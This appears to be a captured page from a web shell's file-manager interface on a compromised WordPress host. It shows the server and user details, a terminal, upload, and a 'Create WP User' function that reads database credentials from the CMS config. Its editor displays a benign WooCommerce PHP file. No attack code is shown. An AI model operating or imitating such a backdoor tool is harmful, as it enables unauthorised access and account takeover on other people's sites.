Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
woocommerce
/
src
/
Internal
/
ProductImage
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
MatchImageBySKU.php
1.92 KB
-rw-r--r--
2026-03-03 00:17
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
MatchImageBySKU.php
<?php /** * MatchImageBySKU class file. */ namespace Automattic\WooCommerce\Internal\ProductImage; defined( 'ABSPATH' ) || exit; /** * Class for the product image matching by SKU. */ class MatchImageBySKU { /** * The name of the setting for this feature. * * @var string */ private $setting_name = 'woocommerce_product_match_featured_image_by_sku'; /** * MatchImageBySKU constructor. */ public function __construct() { $this->init_hooks(); } /** * Initialize the hooks used by the class. */ private function init_hooks() { add_filter( 'woocommerce_get_settings_products', array( $this, 'add_product_image_sku_setting' ), 110, 2 ); } /** * Is this feature enabled. * * @since 8.3.0 * @return bool */ public function is_enabled() { return wc_string_to_bool( get_option( $this->setting_name ) ); } /** * Handler for 'woocommerce_get_settings_products', adds the settings related to the product image SKU matching table. * * @param array $settings Original settings configuration array. * @param string $section_id Settings section identifier. * @return array New settings configuration array. * * @internal For exclusive usage of WooCommerce core, backwards compatibility not guaranteed. */ public function add_product_image_sku_setting( array $settings, string $section_id ): array { if ( 'advanced' !== $section_id ) { return $settings; } $settings[] = array( 'title' => __( 'Product image matching by SKU', 'woocommerce' ), 'type' => 'title', ); $settings[] = array( 'title' => __( 'Match images', 'woocommerce' ), 'desc' => __( 'Set product featured image when uploaded image file name matches product SKU.', 'woocommerce' ), 'id' => $this->setting_name, 'default' => 'no', 'type' => 'checkbox', 'checkboxgroup' => 'start', ); $settings[] = array( 'type' => 'sectionend' ); return $settings; } }
关闭
保存